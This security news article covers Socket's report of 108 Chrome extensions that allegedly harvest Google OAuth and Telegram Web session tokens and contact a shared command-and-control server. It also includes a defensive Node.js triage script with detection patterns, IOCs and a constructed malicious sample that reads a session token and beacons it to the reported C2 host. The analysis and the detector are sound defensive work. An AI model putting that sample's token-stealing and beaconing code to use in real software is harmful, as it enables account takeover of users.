Over 100 Chrome Extensions Linked to Coordinated Data-Stealing Campaign

By Thomas | Published on April 15, 2026


Security researchers at Socket describe a coordinated campaign of Chrome Web Store extensions that they allege were used for data theft and browser manipulation. According to the analysis, 108 extensions belong to the same campaign: each presents as a legitimate utility while carrying out hidden malicious operations. The extensions are distributed under several publisher identities and collectively have a relatively small but targeted install base of roughly 20,000 users.

Scope and Distribution of the Extensions

The extensions linked to this campaign are described as covering a wide range of categories, including messaging-related tools for platforms such as Telegram, video-related utilities for YouTube and TikTok, translation services, and even browser games such as slot-style applications.

Socket’s findings tie the extensions to five publisher identities: Yana Project, GameGen, SideGames, Rodeo Games, and InterAlt. Despite the differing branding and categories, the underlying infrastructure and behavior are reported to be consistent across the set.

Data Theft and Browser Abuse

The analysis describes several mechanisms the extensions allegedly use to extract sensitive user data. A major focus is Google account authentication: a significant subset of the extensions is reported to obtain OAuth2 access tokens and use them to retrieve profile information such as the user's email address, name, and profile image.

Another highlighted component involves Telegram Web sessions. One extension in particular, described as “Telegram Multi-account,” is reported to extract the active session tokens from the browser and transmit them to external servers at frequent intervals. Because a valid session token is accepted in place of a login, whoever holds it can read the account's messaging data without any further authentication step.

Beyond account theft, further behaviors are described across subsets of the extensions: opening arbitrary URLs when the browser starts, injecting advertising content into visited pages, and modifying browsing behavior through background scripts. Socket also notes that some extensions appear able to execute commands issued from the remote backend, changing browser behavior even when the user is not interacting with the extension's interface.

Shared Infrastructure and Attribution Observations

A key point in the report is the centralization of backend infrastructure. The extensions are said to communicate with shared command-and-control systems, including a server referenced as cloudapi[.]stream and the IP address 144.126.135.238. The researchers conclude that this shared backend indicates coordination across all 108 extensions rather than isolated incidents. The list of affected extensions can be found here.
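The behaviors described above (OAuth token harvesting, reads of a page's session storage, periodic beaconing, startup redirects, and contact with the named backend) can be turned into a static triage check that a reviewer runs over an unpacked extension before trusting it. The Node.js script below is an added example, not Socket's tooling and not code from any of the reported extensions. The sample manifest and scripts it scans are constructed for illustration, the `user_auth` key name and the URL paths in them are assumptions, and the scoring weights and verdict thresholds are arbitrary choices.

```javascript
// Added example: static triage of a Chrome extension package for the behaviours
// described in the Socket report. Not Socket's tooling and not code from any of
// the reported extensions; the sample inputs at the bottom are constructed.

// Permissions that, combined with outbound traffic, enable the reported behaviours.
const RISKY_PERMISSIONS = {
  identity: 'can mint Google OAuth tokens via chrome.identity.getAuthToken',
  cookies: 'can read session cookies for hosts it has access to',
  tabs: 'can open or navigate tabs (startup redirects)',
  scripting: 'can inject script into visited pages (ad injection)',
  webRequest: 'can observe or rewrite requests',
};
// Infrastructure indicators named in the report (defanged on the page, plain here).
const KNOWN_IOCS = ['cloudapi.stream', '144.126.135.238'];
// Hosts a legitimate Google-identity extension is expected to talk to.
const FIRST_PARTY_HOSTS = ['googleapis.com'];
// Behaviour patterns: every regex in `all` must match somewhere in the scripts.
// Weights and verdict thresholds are arbitrary choices for this example.
const BEHAVIOUR_PATTERNS = [
  { name: 'oauth-token-harvest', weight: 3, all: [/chrome\.identity\.getAuthToken/, /oauth2\/v\d\/userinfo/] },
  { name: 'session-storage-read', weight: 3, all: [/localStorage\.getItem|document\.cookie|chrome\.cookies\.getAll/] },
  { name: 'periodic-beacon', weight: 2, all: [/setInterval\s*\(/, /fetch\s*\(|XMLHttpRequest|navigator\.sendBeacon/] },
  { name: 'startup-redirect', weight: 2, all: [/chrome\.runtime\.onStartup/, /chrome\.tabs\.create|window\.open/] },
  { name: 'remote-code-eval', weight: 3, all: [/new Function\s*\(|\beval\s*\(/] },
];

// Every http(s) host referenced in script text, lower-cased, in first-seen order.
function extractHosts(text) {
  const hosts = new Set();
  for (const m of text.matchAll(/https?:\/\/([A-Za-z0-9.-]+)/g)) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

// Hosts the manifest declares (host_permissions in MV3, match patterns in permissions in MV2).
function declaredHosts(manifest) {
  const decl = [...(manifest.host_permissions || []), ...(manifest.permissions || [])];
  return decl
    .map(p => (p.match(/^(?:\*|https?):\/\/([^/]+)\//) || [])[1])
    .filter(Boolean)
    .map(h => h.replace(/^\*\./, ''));
}

const matchesDomain = (host, domain) => host === domain || host.endsWith('.' + domain);

// pkg = { manifest: <parsed manifest.json>, scripts: { filename: sourceText } }
function triageExtension(pkg) {
  const findings = [];
  const perms = new Set(pkg.manifest.permissions || []);
  for (const [p, why] of Object.entries(RISKY_PERMISSIONS)) {
    if (perms.has(p)) findings.push({ kind: 'permission', detail: `${p}: ${why}`, weight: 1 });
  }
  const allText = Object.values(pkg.scripts).join('\n');
  for (const pat of BEHAVIOUR_PATTERNS) {
    if (pat.all.every(re => re.test(allText))) {
      findings.push({ kind: 'behaviour', detail: pat.name, weight: pat.weight });
    }
  }
  const declared = declaredHosts(pkg.manifest);
  for (const host of extractHosts(allText)) {
    const ioc = KNOWN_IOCS.find(i => matchesDomain(host, i));
    if (ioc) {
      findings.push({ kind: 'ioc', detail: `contacts reported C2 ${ioc}`, weight: 5 });
    } else if (![...declared, ...FIRST_PARTY_HOSTS].some(d => matchesDomain(host, d))) {
      findings.push({ kind: 'undeclared-host', detail: host, weight: 1 });
    }
  }
  const score = findings.reduce((s, f) => s + f.weight, 0);
  const verdict = score >= 8 ? 'block' : score >= 4 ? 'review' : 'ok';
  return { name: pkg.manifest.name, score, verdict, findings };
}

// Constructed sample exhibiting several reported behaviours. Illustrative only: the
// 'user_auth' key name and the URL paths are assumptions, not any real extension's code.
const SUSPICIOUS = {
  manifest: {
    name: 'Multi-account helper (constructed)', manifest_version: 3,
    permissions: ['identity', 'tabs', 'storage'],
    host_permissions: ['https://web.telegram.org/*'],
  },
  scripts: {
    'content.js': `
      // runs inside the page and reads its session storage
      chrome.runtime.sendMessage({ sess: localStorage.getItem('user_auth') });`,
    'background.js': `
      let lastSess;
      chrome.runtime.onMessage.addListener(m => { lastSess = m.sess; });
      setInterval(() => fetch('https://cloudapi.stream/collect', { method: 'POST', body: lastSess }), 60000);
      chrome.identity.getAuthToken({ interactive: false }, t =>
        fetch('https://www.googleapis.com/oauth2/v3/userinfo?access_token=' + t));
      chrome.runtime.onStartup.addListener(() => chrome.tabs.create({ url: 'http://144.126.135.238/start' }));`,
  },
};

// Constructed benign sample for comparison.
const BENIGN = {
  manifest: { name: 'Word count (constructed)', manifest_version: 3, permissions: ['activeTab'] },
  scripts: { 'content.js': 'console.log(document.body.innerText.split(/\\s+/).length);' },
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const pkg of [SUSPICIOUS, BENIGN]) console.log(JSON.stringify(triageExtension(pkg), null, 2));
}
```

Run it with `node triage.js` to see the constructed suspicious package scored `block` (two IOC hits plus four behaviour patterns) and the benign one scored `ok`. For a real review, read `manifest.json` and the referenced script files out of the unpacked extension directory (under the browser profile's Extensions folder) into the same `{ manifest, scripts }` shape. The permission and behaviour checks are deliberately coarse; a `review` verdict means a human reads the code, and only the IOC hits are strong on their own.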

Socket also reports that multiple extensions contain Russian-language comments in their source code, but offers no definitive attribution for the operators behind the infrastructure. The activity is described as potentially consistent with a malware-as-a-service model, in which stolen session data and identities are monetized or resold.

User Exposure and Security Implications

According to the analysis, the impact varies with each extension's function, but the central concern is unauthorized access to authenticated sessions and personal identity data. For Google accounts, an intercepted OAuth token identifies the user and remains usable for the scopes it was granted until it expires or the grant is revoked. For Telegram Web, a stolen session token may give access to the messages and contacts tied to that active session.

Other described risks include persistent browser-level control, unsolicited navigation triggered on startup, and content injection into visited websites, which could alter the browsing environment without user awareness.

Socket notes that despite takedown requests, a number of the extensions reportedly remained available at the time of reporting. Affected users should remove the extensions and then, depending on which services they used, review connected application permissions and active sessions. Uninstalling alone does not invalidate a session token that has already been exfiltrated: a Telegram Web session stays valid until it is terminated from the account's active sessions list, and a Google grant stays valid until it is revoked from the account's third-party access settings.

Conclusion

The reported campaign shows browser extensions functioning as covert data collection tools behind the appearance of ordinary utilities. With shared infrastructure, multiple publisher identities, and overlapping malicious behaviors, the activity Socket describes points to a coordinated ecosystem rather than isolated abuse. While attribution remains uncertain, the findings underscore how an extension marketplace can be leveraged for persistent session theft, identity collection, and remote browser manipulation when supply chain controls are weak or slow to act.
